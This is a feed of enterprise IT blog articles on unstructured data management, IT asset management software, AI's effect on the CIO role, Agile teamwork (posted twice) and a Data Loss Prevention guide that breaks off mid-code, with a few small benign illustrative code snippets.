
Why CIOs need a new approach to unstructured data management

16 January 2026 at 05:00

CIOs everywhere will be familiar with the major issues caused by collecting and retaining data at an increasingly rapid rate. Industry research shows 64% of enterprises manage at least 1 petabyte of data, creating substantial cost, governance and compliance pressures.

If that wasn’t enough, organizations frequently default to retaining these enormous datasets, even when they are no longer needed. To put this into context, the average useful life of most enterprise data has now shrunk to 30–90 days; however, for various reasons, businesses continue to store it indefinitely, thereby adding to the cost and complexity of their underlying infrastructure.

As much as 90% of this information comes in the form of unstructured data files spread across hybrid, multi-vendor environments with little to no centralized oversight. This can include everything from MS Office docs to photo and video content routinely used by the likes of marketing teams, for example. The list is extensive, stretching to invoices, service reports, log files and in some organizations even scans or faxes of hand-written documents, often dating back decades.

In these circumstances, CIOs often lack clear visibility into what data exists, where it resides, who owns it, how old it is or whether it holds any business value. This matters because in many cases it has tremendous value, with the potential to offer insight into a range of important business issues, such as customer behavior or field quality challenges.

With the advent of GenAI, it is now realistic to use the knowledge embedded in all kinds of documents and to retrieve their high-quality (i.e., relevant, useful and correct) content, even from documents of low visual or graphical quality. As a result, running AI on a combination of structured and unstructured input can reconstruct the entire enterprise memory, including the so-called “tribal knowledge”.

Visibility and governance

The first point to appreciate is that the biggest challenge is not the amount of data being collected and retained, but the absence of meaningful visibility into what is being stored.

Without an enterprise-wide view (a situation common to many organizations), teams cannot determine which data is valuable, which is redundant, or which poses a risk. In particular, metadata remains underutilised, even though insights such as creation date, last access date, ownership, activity levels and other basic indicators can immediately reveal security risks, duplication, orphaned content and stale data.

Visibility begins by building a thorough understanding of the existing data landscape. This can be done by using tools that scan storage platforms across multi-vendor and multi-location environments, collect metadata at scale, and generate virtual views of datasets. This allows teams to understand the size, age, usage and ownership of their data, enabling them to identify duplicate, forgotten or orphaned files.
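As a minimal illustration of metadata-driven visibility, the sketch below walks a directory tree and records the basic indicators mentioned above (size, last access, last modification). It is an assumption-laden toy: a real scanner would work across multi-vendor storage platforms via their APIs rather than a local filesystem, and the one-year staleness threshold is hypothetical.

```python
import time
from pathlib import Path

STALE_DAYS = 365  # assumption: treat files untouched for a year as stale

def scan_metadata(root):
    """Walk a storage root and collect basic metadata for every file."""
    now = time.time()
    records = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        st = path.stat()
        records.append({
            "path": str(path),
            "size_bytes": st.st_size,
            "last_access_days": (now - st.st_atime) / 86400,
            "last_modified_days": (now - st.st_mtime) / 86400,
        })
    return records

def flag_stale(records, stale_days=STALE_DAYS):
    """Return files whose last access is older than the threshold."""
    return [r for r in records if r["last_access_days"] > stale_days]
```

Even this crude pass surfaces the questions the article raises: how big, how old, and how recently touched each file is, which is the raw material for spotting duplicate, forgotten or orphaned content.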

It’s a complex challenge. In most cases, some data will be on-premises and some in the cloud, with some stored as files and some as objects (for example in S3 or Azure Blob Storage). In these circumstances, the multi-vendor infrastructure approach adopted by many organizations is sound, as it facilitates data redundancy and replication while also protecting against increasingly common cloud outages, such as those seen at Amazon and Cloudflare.

With visibility tools and processes in place, the next requirement is to introduce governance frameworks that bring structure and control to unstructured data estates. Good governance enables CIOs to align information with retention rules, compliance obligations and business requirements, reducing unnecessary storage and risk.

It’s also dependent on effective data classification processes, which help determine which data should be retained, which can be relocated to lower-cost platforms and which no longer serves a purpose. Together, these processes establish clearer ownership and ensure data is handled consistently across the organization, while also providing the basis for reliable decision-making by keeping data accurate. Without governance, visibility alone cannot deliver operational or financial benefits, because there is no framework for acting on what the organization discovers.

Lifecycle management

Once CIOs have a clear view of what exists and a framework to control it, they need a practical method for acting on those findings across the data lifecycle. By applying metadata-based policies, teams can migrate older or rarely accessed data to lower-cost platforms, thereby reducing pressure on primary storage. Files that have not been accessed for an extended period can be relocated to more economical systems, while long-inactive data can be archived or removed entirely if appropriate.
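A metadata-based policy of this kind can be sketched as a simple rule table mapping last-access age to a storage tier. The thresholds and tier names below are hypothetical; real policies come from the governance framework described earlier.

```python
from dataclasses import dataclass

@dataclass
class FileRecord:
    path: str
    last_access_days: float

# Hypothetical tiering rules, checked from oldest threshold downward.
TIER_POLICY = [
    (1095, "archive"),  # inactive for more than 3 years
    (365, "cold"),      # inactive for more than 1 year
    (90, "warm"),       # inactive for more than 90 days
]

def assign_tier(record):
    """Map a file to a storage tier based on how long it has sat unaccessed."""
    for threshold_days, tier in TIER_POLICY:
        if record.last_access_days > threshold_days:
            return tier
    return "primary"
```

Running every scanned file through a rule table like this is what lets teams bulk-migrate rarely accessed data off primary storage by policy rather than by hand.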

A big part of the challenge is that the data lifecycle is now much longer than it used to be, a situation that has profoundly affected how organizations approach storage strategy and spend.

For example, datasets considered ‘active’ will typically be stored on high- or mid-performance systems. Once again, there are both on-premises and cloud options to consider, depending on the use case, but typically they include both file and object requirements.

As time passes (often years), data gradually becomes eligible for archival. It is then moved to an archive platform, where it is better protected but may become less accessible or require more checks before access. Inside the archive, it can (after even more years) be tiered to cheaper storage such as tape, at which point retrieval times might range from minutes to hours, or even days. In each case, archived data is typically subject to regulatory requirements and can be used during e-discovery.

In most circumstances, it is only after this stage has been reached that data is finally eligible to be deleted.

When organizations take this approach, many discover that a significant proportion of their stored information falls into the inactive or long-inactive category. Addressing this issue immediately frees capacity, reduces infrastructure expenditure and helps prevent the further accumulation of redundant content.

Policy-driven lifecycle management also improves operational control. It ensures that data is retained according to its relevance rather than by default and reduces the risk created by carrying forgotten or outdated information. It supports data quality by limiting the spread of stale content across the estate and provides CIOs with a clearer path to meeting retention and governance obligations.

What’s more, at a strategic level, lifecycle management transforms unstructured data from an unmanaged cost into a controlled process that aligns storage with business value. It strengthens compliance by ensuring only the data required for operational or legal reasons is kept, and it improves readiness for AI and analytics initiatives by ensuring that underlying datasets are accurate and reliable.

To put all these issues into perspective, the business obsession with data shows no sign of slowing down. Indeed, the growing adoption of AI technologies is raising the stakes even further, particularly for organizations that continue to prioritize data collection and storage over management and governance. As a result, getting data management and storage strategies in order sooner rather than later is likely to rise to the top of the to-do list for CIOs across the board.

This article is published as part of the Foundry Expert Contributor Network.

The capabilities CIOs should demand from IT asset management software in 2026

7 January 2026 at 11:10

According to recent research by Freshworks, organizational complexity accounts for 7% of total annual revenue loss for an average business. Software is a major contributor, with companies estimating a loss of $1 out of every $5 spent on total software due to complexity, including IT complexity. That’s time, talent, and money that could instead be fueling innovation, improving customer experience, and driving expansion.

IT asset management (ITAM) solutions are one of the most effective ways to combat software complexity. They provide tools for recording, categorizing, and organizing technology assets, giving IT leaders visibility across hardware, software, and cloud resources. Beyond reducing cost and operational complexity, ITAM mitigates business risk: unused or poorly tracked software can create security vulnerabilities, increase points of failure, and expose organizations to audit and compliance issues—especially in regulated industries. Acting as a central hub, ITAM ensures accurate data, supports better decisions, streamlines operations, and maintains compliance.

How should CIOs go about choosing the right ITAM platform?

The best ITAM software does more than track inventory. It provides unified visibility across all assets, automates lifecycle processes, and integrates tightly with IT service management so asset data drives operational decisions. The right platform depends on asset scale, regulatory requirements, and ITSM maturity. CIOs should prioritize solutions that turn asset data into actionable intelligence rather than static records.

At a minimum, leading ITAM platforms should deliver:

  • Unified asset visibility across hardware, software, cloud, and SaaS
  • End-to-end lifecycle automation, from procurement to retirement
  • Native ITSM integration that connects assets to incidents, changes, and SLAs

What capabilities define full-lifecycle IT asset management?

  • Acquisition & procurement to onboard vendors and capture cost data
  • Deployment to assign assets, update inventory, and validate configurations
  • Usage & operation to monitor performance, usage, incidents, and changes
  • Maintenance to manage patching, warranty tracking, and scheduled service
  • Retirement & disposal to decommission assets, perform secure wipes, manage disposition, and maintain audit trails

The most effective platforms manage all of these stages within a single workflow, rather than across disconnected tools.

How do leading ITAM platforms support ITSM workflows?

The strongest IT asset lifecycle platforms are deeply integrated with IT service management systems. Assets are not static records, but rather operational entities tied to SLAs, incidents, and changes.

For example, when an incident is logged, the service desk can immediately identify the affected device, its dependencies, warranty status, and change history. Automated workflows can trigger asset reassignment during employee offboarding or initiate refresh cycles when hardware reaches end of life.

This tight coupling between ITAM and ITSM improves resolution times, supports root-cause analysis, and enables proactive service delivery.
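The incident-enrichment pattern described above can be sketched with a hypothetical in-memory asset registry; real ITAM platforms expose the same lookup through their APIs, but the shape of the data flow is the same.

```python
# Hypothetical asset registry: ID -> owner, warranty, dependencies, history.
ASSETS = {
    "LT-1042": {
        "owner": "jdoe",
        "warranty_expires": "2027-03-01",
        "depends_on": ["VPN-GW-01"],
        "change_history": ["2026-01-02: OS patch applied"],
    },
}

def enrich_incident(incident):
    """Attach asset metadata to an incident so the service desk sees
    the affected device's context without a separate lookup."""
    asset = ASSETS.get(incident["asset_id"], {})
    return {**incident, "asset_context": asset}
```

The point of the coupling is that the service desk receives the warranty status, dependencies and change history in the same record as the incident itself, rather than chasing them across systems.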

What capabilities should CIOs look for in ITAM solutions?

The best ITAM solutions support end-to-end visibility and automation at scale. Key features to look for include: 

  1. Centralized hardware & software inventory to track laptops, servers, mobile devices, SaaS applications, licenses, and virtual assets in a single system of record
  2. Automated discovery & dependency mapping to identify assets using agent-based and agentless scanning, network discovery, and configuration management database (CMDB) relationships, and to understand how assets interact
  3. SaaS license & software management to reduce spend through license utilization insights, unused seat reclamation, automated renewal visibility, and contract linkage
  4. Lifecycle tracking from procurement to disposal to effectively monitor every aspect of assets, including purchase cost, warranties, depreciation, maintenance events, assignment history, and end-of-life milestones 
  5. Workflow automation to automate lifecycle activities such as onboarding and device assignment, patching and maintenance, asset return workflows, and retirement approvals
  6. Contract, vendor & compliance governance to maintain operational efficiency and compliance through renewal reminders, contract metadata, vendor performance reviews, audit readiness, and lifecycle governance
  7. Integrations & API support to connect with HRIS (for onboarding and offboarding), procurement systems, SSO/SaaS management tools, MDM solutions, service desks, and related platforms
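Dependency mapping (item 2 above) ultimately reduces to graph traversal over CMDB relationships: given one asset, walk outward to everything it relies on. A minimal sketch with hypothetical asset names:

```python
from collections import deque

# Hypothetical CMDB relationship data: asset -> assets it depends on.
DEPENDENCIES = {
    "web-app": ["app-server"],
    "app-server": ["db-server", "auth-service"],
    "auth-service": ["db-server"],
}

def impacted_by(asset, deps=DEPENDENCIES):
    """Breadth-first walk of the dependency graph to find every asset
    the given one transitively relies on."""
    seen, queue = set(), deque([asset])
    while queue:
        current = queue.popleft()
        for dep in deps.get(current, []):
            if dep not in seen:
                seen.add(dep)
                queue.append(dep)
    return seen
```

This is the mechanism behind "understand how assets interact": when an incident hits `db-server`, the same traversal run in reverse tells the service desk which services upstream are at risk.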

Freshservice: An integrated approach to ITAM and ITSM in practice

These capabilities come together in practice when ITAM and ITSM are designed as a single, integrated system, an approach embodied by Freshservice from Freshworks. With asset lifecycle management and an integrated CMDB, organizations track resources across every stage and gain visibility into how assets interact. By unifying ITAM and ITSM, teams can automate workflows, maintain compliance, and make faster, data-driven decisions.


7 changes to the CIO role in 2026

7 January 2026 at 05:00

Everything is changing, from data pipelines and technology platforms, to vendor selection and employee training — even core business processes — and CIOs are in the middle of it to guide their companies into the future.

In 2024, tech leaders asked themselves whether AI even works and how to use it. Last year, the big question was what the best use cases are for the new technology. This year will be all about scaling up and starting to use AI to fundamentally transform how employees, business units, or even entire companies actually function.

However IT was thought of before, it’s now a driver of restructuring. Here are seven ways the CIO role will change in the next 12 months.

Enough experimenting

The role of the CIO will change for the better in 2026, says Eric Johnson, CIO at incident management company PagerDuty, with a lot of business benefit and opportunity in AI.

“It’s like having a mine of very valuable minerals and gold, and you’re not quite sure how to extract it and get full value out of it,” he says. Now, he and his peers are being asked to do just that: move out of experimentation and into extraction.

“We’re being asked to take everything we’ve learned over the past couple of years and find meaningful value with AI,” he says.

What makes this extra challenging is the pace of change is so much faster now than before.

“What generative AI was 12 months ago is completely different to what it is today,” he says. “And the business folks watching that transformation occur are starting to hear of use cases they never heard of months ago.”

From IT manager to business strategist

The traditional role of a company’s IT department has been to provide technology support to other business units.

“You tell me what the requirements are, and I’ll build you your thing,” says Marcus Murph, partner and head of technology consulting at KPMG US.

But the role is changing from back-office order taker to full business partner working alongside business leaders to leverage innovation.

“My instincts tell me that for at least the next decade, we’ll see such drastic change in technology that they won’t go back to the back office,” he says. “We’re probably in the most rapid hyper cycle of change at least since the internet or mobile phones, but almost certainly more than that.”

Change management

As AI transforms how people do their jobs, CIOs will be expected to step up and help lead the effort.

“A lot of the conversations are about implementing AI solutions, how to make solutions work, and how they add value,” says Ryan Downing, VP and CIO of enterprise business solutions at Principal Financial Group. “But the reality is with the transformation AI is bringing into the workplace right now, there’s a fundamental change in how everyone will be working.”

This transformation will challenge everyone, he says, in terms of roles, value proposition of what’s been done for years, and expertise.

“The technology we’re starting to bring into the workplace is really shaping the future of work, and we need to be agents of change beyond the tech,” he says.

That change management starts within the IT organization itself, adds Matt Kropp, MD and senior partner and CTO at Boston Consulting Group.

“There’s quite a lot of focus on AI for software development because it’s maybe the most advanced, and the tools have been around for a while,” he says. “There’s a very clear impact using AI agents for software developers.”

The lessons that CIOs learn from managing this transformation can be applied in other business units, too, he says.

“What we see happening with AI for software development is a canary in the coal mine,” he adds. And it’s an opportunity to ensure the company is getting the productivity gains it’s looking for, but also to create change management systems that can be used in other parts of the enterprise. And it starts with the CIO.

“You want the top of the organization saying they expect everyone to use AI because they use it, and can demonstrate how they use it as part of their work,” he says. Leaders need to lead by example that the use of AI is allowed, accepted, and expected.

CIOs and other executives can use AI to create first drafts of memos, organize meeting notes, and help them think through strategy. And any major technology initiative will include a change management component, yet few technologies have had as dramatic an impact on work as AI is having, and is expected to have.

Deploying AI at scale in an enterprise, however, is a very contentious issue, says Ari Lightman, a professor at Carnegie Mellon University. Companies have spent a lot of time focusing on understanding the customer experience, he says, but few focus on the employee experience.

“When you roll out enterprise-wide AI systems, you’re going to have people who are supportive and interested, and people who just want to blow it up,” he says. Without addressing the issues that employees have, AI projects can grind to a halt.

Cleaning up the data

As AI projects scale up, so will their data requirements. Instead of limited, curated data sets, enterprises will need to modernize their data stacks if they haven’t already, and make the data ready and accessible for AI systems while ensuring security and compliance.

“We’re thinking about data foundations and making sure we have the infrastructure in place so AI is something we can leverage and get value out of,” says Aaron Rucker, VP of data at Warner Music.

The security aspect is particularly important as AI agents gain the ability to autonomously seek out and query data sources. This was much less of a concern with small pilot projects or RAG embedding, where developers carefully curated the data that was used to augment AI prompts. And before gen AI, data scientists, analysts, and data engineers were the ones accessing data, which offered a layer of human control that might diminish or completely vanish in the agentic age. That means the controls will need to move closer to the data itself.

“With AI, sometimes you want to move fast, but you still want to make sure you’re setting up data sources with proper permissions so someone can’t just type in a chatbot and get all the family jewels,” says Rucker.
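One way to read "controls moving closer to the data" is a permission check enforced at the data source itself, so an agent cannot reach anything its role is not entitled to. A minimal sketch with a hypothetical role-based allowlist; production systems would enforce this with IAM policies rather than an in-process dictionary:

```python
# Hypothetical allowlist: agent role -> data sources it may query.
PERMISSIONS = {
    "marketing_agent": {"campaign_stats", "public_catalog"},
    "finance_agent": {"invoices", "ledger"},
}

class AccessDenied(Exception):
    pass

def query_source(agent_role, source, run_query):
    """Refuse the query unless the agent's role is allowed to read the source.
    The check sits in front of the data, not inside the agent's prompt."""
    if source not in PERMISSIONS.get(agent_role, set()):
        raise AccessDenied(f"{agent_role} may not read {source}")
    return run_query(source)
```

Because the gate lives at the source, it holds even when an autonomous agent discovers a dataset nobody curated for it, which is exactly the scenario that small RAG pilots never had to worry about.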

Make build vs buy decisions

This year, the build or buy decisions for AI will have dramatically bigger impacts than they did before. In many cases, vendors can build AI systems better, quicker, and cheaper than a company can do it themselves. And if a better option comes along, switching is a lot easier than when you’ve built something internally from scratch. On the other hand, some business processes represent core business value and competitive advantage, says Rucker.

“HR isn’t a competitive advantage for us because Workday is going to be better positioned to build something that’s compliant,” he says. “It wouldn’t make sense for us to build that.”

But then there are areas where Warner Music can gain a strategic advantage, he says, and it’s going to be important to figure out what this advantage is going to be when it comes to AI.

“We shouldn’t be doing AI for AI’s sake,” says Rucker. “We should attach it to some business value as a reflection of our company strategy.”

If a company uses outside vendors for important business processes, there’s a risk the vendor will come to understand an industry better than the existing players.

Digitizing a business process creates behavioral capital, network capital, and cognitive capital, says John Sviokla, executive fellow at the Harvard Business School and co-founder of GAI Insights. It unlocks something that used to be exclusively inside the minds of employees.

Companies have already traded their behavioral capital to Google and Facebook, and network capital to Facebook and LinkedIn.

“Trading your cognitive capital for cheap inference or cheap access to technology is a very bad idea,” says Sviokla. Even if the AI company or hyperscaler isn’t currently in a particular line of business, this gives them the starter kit to understand that business. “Once they see a massive opportunity, they can put billions of dollars behind it,” he says.

Platform selection

As AI moves from one-off POCs and pilot projects to deployments at scale, companies will have to come to grips with choosing an AI platform, or platforms.

“With things changing so fast, we still don’t know who’s going to be the leaders in the long term,” says Principal’s Downing. “We’re going to start making some meaningful bets, but I don’t think the industry is at the point where we pick one and say that’s going to be it.”

The key is to pick platforms that have the ability to scale, but are decoupled, he says, so enterprises can pivot quickly, but still get business value. “Right now, I’m prioritizing flexibility,” he says.

Bret Greenstein, chief AI officer at management consulting firm West Monroe Partners, recommends CIOs identify aspects of AI that are stable, and those that change rapidly, and make their platform selections accordingly.

“Keep your AI close to the cloud because the cloud is going to be stable,” he says. “But the AI agent frameworks will change in six months, so build to be agnostic in order to integrate with any agent frameworks.”
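Building to be agnostic typically means putting a thin adapter interface between business logic and whichever agent framework is current, so a framework swap touches one adapter rather than every call site. A minimal sketch of that boundary; the backend class here is a hypothetical stand-in, not a real framework:

```python
from abc import ABC, abstractmethod

class AgentBackend(ABC):
    """Adapter boundary: application code never imports a framework directly."""
    @abstractmethod
    def run(self, task: str) -> str: ...

class EchoBackend(AgentBackend):
    # Stand-in implementation; a real adapter would wrap a specific
    # agent framework behind this same interface.
    def run(self, task: str) -> str:
        return f"handled: {task}"

def execute(task: str, backend: AgentBackend) -> str:
    # Business logic depends only on the interface, so when the framework
    # landscape shifts in six months, only a new adapter is written.
    return backend.run(task)
```

The stable cloud layer sits below this seam; the fast-moving agent frameworks sit above it, each behind its own adapter.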

Progressive CIOs are building the enterprise infrastructure of tomorrow and have to be thoughtful and deliberate, he adds, especially around building governance models.

Revenue generation

AI is poised to massively transform business models across every industry. This is a threat to many companies, but also an opportunity for others. By helping to create new AI-powered products and services, CIOs can make IT a revenue generator instead of just a cost center.

“You’re going to see this notion of most IT organizations directly building tech products that enable value in the marketplace, and change how you do manufacturing, provide services, and how you sell a product in a store,” says KPMG’s Murph.

That puts IT much closer to the customer than it had been before, raising its profile and significance in the organization, he says.

“In the past, IT was one level away from the customer,” he says. “They enabled the technology to help business functions sell products and services. Now with AI, CIOs and IT build the products, because everything is enabled by technology. They go from the notion of being services-oriented to product-oriented.”

One CIO already doing this is Amith Nair at Vituity, a national physician group serving 13.8 million patients.

“We’re building products internally and providing them back to the hospital system, and to external customers,” he says.

For example, doctors spend hours a day transcribing conversations with patients, which is something AI can help with. “When a patient comes in, they can just have a conversation,” he says. “Instead of looking at the computer and typing, they look at and listen to the patient. Then all of their charting, medical decision processes, and discharge summaries are developed using a multi-agent AI platform.”

The tool was developed in-house, custom-built on top of the Microsoft Azure platform, and is now a startup running on its own, he says.

“We’ve become a revenue generator,” he says.

How Agile Project Management Improves Team Collaboration and Productivity

3 January 2026 at 02:22

Have you ever noticed how some teams move smoothly while others struggle with delays and confusion? Many professionals exploring a PRINCE2 Course are now curious about how Agile Project Management fits into modern teamwork. Agile is not about rushing work. It is about working together better. It creates space for clear communication, shared ownership, and steady progress. When teams collaborate well, productivity follows naturally. Agile focuses on people first and plans second, which helps teams adapt without stress.  

In this blog, let us explore how Agile strengthens collaboration and improves productivity in a simple, practical way. 

Table of Contents

  • Why Agile Creates Stronger Team Connections
  • How Agile Project Management Helps Teams Work Better Together
  • Conclusion

Why Agile Creates Stronger Team Connections

Agile fosters a tighter bond between team members and the work itself. Teams collaborate in brief cycles rather than lengthy handovers or discrete tasks. Everyone is aware of what is going on and why it matters right now. This shared visibility builds confidence and eliminates uncertainty early.

Teams can maintain alignment without lengthy meetings by having regular conversations. Issues are brought up early and resolved together. People instinctively support one another and talk honestly when they feel connected.

How Agile Project Management Helps Teams Work Better Together

Below are the key ways Agile improves collaboration and boosts productivity across project teams: 

Shared Ownership Improves Accountability

Instead of operating in silos, Agile encourages teams to assume collective accountability. No single role owns all of the tasks; the team as a whole is committed to results and progress.

Delays and finger-pointing are decreased by this shared ownership. When assistance is required, people act without waiting for orders. Work proceeds more quickly as a result, and accountability feels encouraged rather than coerced.

Short Feedback Cycles Keep Work on Track 

Agile depends on regular feedback to direct development. Teams frequently examine their work and make minor adjustments rather than major ones afterwards. This maintains attention on the things that offer value. 

Stakeholder engagement is also maintained through feedback. There are fewer surprises and clearer expectations. Teams that constantly learn and adapt see increases in productivity without additional strain.

Clear Priorities Reduce Overload

Agile helps teams concentrate on the most important tasks at hand. Work is prioritised by value and impact rather than by long task lists. This prevents mental exhaustion and overload.

Teams cease multitasking and begin completing tasks once priorities are established. Instead of constantly switching, energy is expended on significant advancement. This clarity promotes consistent and long-term productivity. 

Better Communication Builds Team Confidence 

Agile communication is straightforward, consistent, and truthful. Without complicated reporting, teams regularly exchange updates. At any given time, everyone is aware of the status of the task.

This transparency increases stakeholder and team trust. Because information is visible, decisions are made more quickly. When communication is straightforward and effortless, confidence increases. 

Flexible Planning Supports Real World Change 

Agile acknowledges that project work involves change. Plans are reviewed frequently and modified as necessary. Teams can react to new information more composedly thanks to this adaptability.

Teams embrace change to achieve better outcomes rather than fight it. Work continues to be relevant and in line with objectives. Planning that is flexible maintains momentum and reduces frustration.

Continuous Improvement Strengthens Team Performance 

Agile encourages teams to consider not only what they produce but also how they operate. Frequent evaluations assist in determining what is effective and what requires modification.
 
Over time, minor adjustments frequently result in greater performance. Every cycle makes teams more competent and self-assured. This emphasis on education keeps productivity rising. 

Visible Progress Keeps Teams Motivated 

Agile allows all parties to see progress. Work is divided into manageable chunks, and advancement is routinely assessed. By doing this, teams are able to observe outcomes sooner rather than later. 

Motivation and confidence are increased by observable progress. As work progresses gradually, teams get a sense of accomplishment. Stakeholders also benefit from clarity, which lessens pressure and needless follow-ups. Teams remain engaged, and productivity stays consistent when progress is visible.

Conclusion

Agile is more than a delivery approach. It is a way of working that improves how teams communicate, collaborate, and perform. By encouraging shared ownership, clear priorities, and regular feedback, Agile helps productivity grow naturally. Teams feel more connected, confident, and focused. For professionals looking to balance flexibility with structure, PRINCE2 Training can support combining Agile ways of working with proven project control to deliver strong outcomes in modern project environments. 

How Agile Project Management Improves Team Collaboration and Productivity

3 January 2026 at 00:45

Have you ever noticed how some teams move smoothly while others struggle with delays and confusion? Many professionals exploring a PRINCE2 Course are now curious about how Agile Project Management fits into modern teamwork. Agile is not about rushing work. It is about working together better. It creates space for clear communication, shared ownership, and steady progress. When teams collaborate well, productivity follows naturally. Agile focuses on people first and plans second, which helps teams adapt without stress.  

In this blog, let us explore how Agile strengthens collaboration and improves productivity in a simple, practical way. 

Table of Contents

  • Why Agile Creates Stronger Team Connections
  • How Agile Project Management Helps Teams Work Better Together
  • Conclusion

Why Agile Creates Stronger Team Connections

Agile fosters a tighter bond between team members and the work itself. Teams collaborate in brief cycles rather than lengthy handovers or discrete tasks. Everyone is aware of what is going on and why it is important right now. Confidence is increased, and uncertainty is eliminated early due to this shared visibility. 

Teams can maintain alignment without lengthy meetings by having regular conversations. Issues are brought up early and resolved together. People instinctively support one another and talk honestly when they feel connected.

How Agile Project Management Helps Teams Work Better Together

Below are the key ways Agile improves collaboration and boosts productivity across project teams: 

Shared Ownership Improves Accountability

Instead of operating in silos, agile encourages teams to assume collective accountability. One role does not own all of the tasks. The team as a whole is dedicated to results and advancement. 

Delays and finger-pointing are decreased by this shared ownership. When assistance is required, people act without waiting for orders. Work proceeds more quickly as a result, and accountability feels encouraged rather than coerced.

Short Feedback Cycles Keep Work on Track 

Agile depends on regular feedback to direct development. Teams frequently examine their work and make minor adjustments rather than major ones afterwards. This maintains attention on the things that offer value. 

Feedback also keeps stakeholders engaged. There are fewer surprises, and expectations stay clear. Teams that constantly learn and adapt see productivity rise without additional strain. 

Clear Priorities Reduce Overload

Agile assists teams in concentrating on the most important tasks at hand. Long task lists are not used to prioritise work; instead, value and impact are considered. This avoids mental exhaustion and overburden.

Teams cease multitasking and begin completing tasks once priorities are established. Instead of constantly switching, energy is expended on significant advancement. This clarity promotes consistent and long-term productivity. 

Better Communication Builds Team Confidence 

Agile communication is straightforward, consistent, and truthful. Without complicated reporting, teams regularly exchange updates. At any given time, everyone is aware of the status of the task.

This transparency increases stakeholder and team trust. Because information is visible, decisions are made more quickly. When communication is straightforward and effortless, confidence increases. 

Flexible Planning Supports Real-World Change 

Agile acknowledges that project work involves change. Plans are reviewed frequently and modified as necessary. This adaptability lets teams react to new information more calmly.

Teams embrace change to achieve better outcomes rather than fight it. Work continues to be relevant and in line with objectives. Planning that is flexible maintains momentum and reduces frustration.

Continuous Improvement Strengthens Team Performance 

Agile encourages teams to consider not only what they produce but also how they operate. Frequent evaluations assist in determining what is effective and what requires modification.
 
Over time, minor adjustments frequently result in greater performance. Every cycle makes teams more competent and self-assured. This emphasis on learning keeps productivity rising. 

Visible Progress Keeps Teams Motivated 

Agile allows all parties to see progress. Work is divided into manageable chunks, and advancement is routinely assessed. By doing this, teams are able to observe outcomes sooner rather than later. 

Motivation and confidence are increased by observable progress. As work progresses gradually, teams get a sense of accomplishment. Additionally, stakeholders benefit from clarity, which lessens pressure and needless follow-ups. Teams remain engaged, and productivity stays constant when progress is seen.

Conclusion

Agile is more than a delivery approach. It is a way of working that improves how teams communicate, collaborate, and perform. By encouraging shared ownership, clear priorities, and regular feedback, Agile helps productivity grow naturally. Teams feel more connected, confident, and focused. For professionals looking to balance flexibility with structure, PRINCE2 Training can support combining Agile ways of working with proven project control to deliver strong outcomes in modern project environments. 

Data Loss Prevention Framework and Lifecycle – Complete Guide

21 December 2025 at 11:21

In the high-stakes digital environment of 2025, Data Loss Prevention (DLP) has evolved from a backend security utility into a front-line strategic capability. As organizations confront the dual pressures of AI-driven cyber threats and increasingly complex regulatory obligations, a mature DLP framework delivers the visibility required to manage human risk and safeguard proprietary algorithms. When integrated into a Zero Trust architecture, DLP ensures that sensitive data remains protected—even as it traverses decentralized, cloud-native, and highly automated workflows.

The Strategic Value of Modern DLP

Modern DLP programs extend far beyond traditional data blocking mechanisms. They now play a critical role in strengthening organizational resilience, enabling regulatory agility, and reinforcing digital trust:

  • Visibility into Shadow AI: Advanced DLP solutions detect and restrict unauthorized use of consumer-grade large language models (LLMs), preventing employees from unintentionally exposing proprietary data to public AI training environments.
  • Mitigation of Deepfake-Driven Phishing: By continuously monitoring outbound data flows, DLP acts as a protective layer against AI-powered social engineering attacks that exploit human trust to exfiltrate sensitive information.
  • Operational Resilience Against Ransomware: Beyond data protection, DLP enhances business continuity by identifying ransomware-as-a-service (RaaS) activity at the data exfiltration stage—often before encryption or system disruption occurs.
  • Regulatory Speed-to-Market: With the EU AI Act and evolving GDPR requirements now in force, automated data discovery and classification within DLP enable organizations to scale into new markets without costly, manual compliance rework.
  • Enhanced Insider Risk Management: Behavioral analytics embedded within DLP platforms distinguish legitimate business activity from anomalous or malicious data movement, significantly reducing time to detect insider-driven incidents.
  • Cloud Ecosystem Security: As cloud misconfigurations remain a leading cause of breaches, DLP provides a unified policy enforcement layer that protects sensitive data across hybrid and multi-cloud environments.
  • Quantum-Era Preparedness: Forward-looking DLP strategies are beginning to incorporate quantum-resistant cryptographic controls to mitigate “harvest now, decrypt later” threats targeting long-lived sensitive data.
  • Trust as a Competitive Differentiator: In an environment marked by frequent data breaches, a demonstrable and well-governed DLP posture strengthens customer confidence and becomes a decisive factor in B2B partnerships.
  • Supply Chain Data Protection: DLP extends governance controls beyond organizational boundaries, reducing exposure from third-party vendors and mitigating risks associated with supply chain-based data attacks.
  • Autonomous Security Through Agentic AI: Next-generation DLP platforms leverage agentic AI to autonomously quarantine sensitive data, revoke access, and enforce policies in real time—shifting defense from human response speed to machine-speed enforcement.

What Is Data Loss Prevention (DLP)?

In the high-stakes digital environment of 2025, Data Loss Prevention (DLP) has evolved from a simple gatekeeping tool into a sophisticated ecosystem of policies, tools, and controls designed to safeguard the lifeblood of modern enterprise: information. By enforcing strict protocols to prevent unauthorized access, leakage, or misuse, a mature DLP strategy ensures that sensitive data—whether it is "at rest" in local databases, "in motion" across global networks, or "in use" during collaborative sessions—remains both secure and compliant with intensifying global mandates.

The modern necessity for DLP is driven by a surge in AI-powered cyber threats and Deepfake phishing, which have made traditional perimeter defenses nearly obsolete. As organizations migrate to decentralized work, they are increasingly adopting a Zero Trust architecture, where DLP acts as the final verification layer to ensure that even "authenticated" users cannot move sensitive assets without specific authorization. This is particularly critical as Agentic AI—autonomous systems capable of making their own decisions—begins to navigate corporate data, requiring DLP to monitor machine-to-machine interactions just as closely as human ones.

Furthermore, the rise of Cloud security challenges and Supply chain attacks has pushed DLP to integrate more deeply with Continuous Threat Exposure Management (CTEM), allowing security teams to see risk in real-time. Organizations are also preparing for the future of "harvest now, decrypt later" by investing in Quantum-resistant cryptography, ensuring that even if data is leaked, it remains unreadable to future adversaries. Ultimately, with Ransomware-as-a-Service (RaaS) and Insider threats reaching all-time highs, DLP serves as the essential "Human Risk Management" tool, providing the visibility needed to detect Shadow AI usage and maintain trust in an increasingly volatile digital world.

Understanding the Data Lifecycle

  • Creation: Data is generated or modified
  • Storage: Data stored in databases or cloud
  • Use: Data accessed or processed
  • Sharing: Data transmitted externally
  • Archival: Long-term retention
  • Destruction: Secure disposal
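The stage sequence above can be sketched as a simple state machine. The transition map below is an illustrative assumption for this guide (for example, whether archived data may return to active use varies by retention policy), not the behavior of any specific DLP product:

```python
from enum import Enum, auto

class Stage(Enum):
    CREATION = auto()
    STORAGE = auto()
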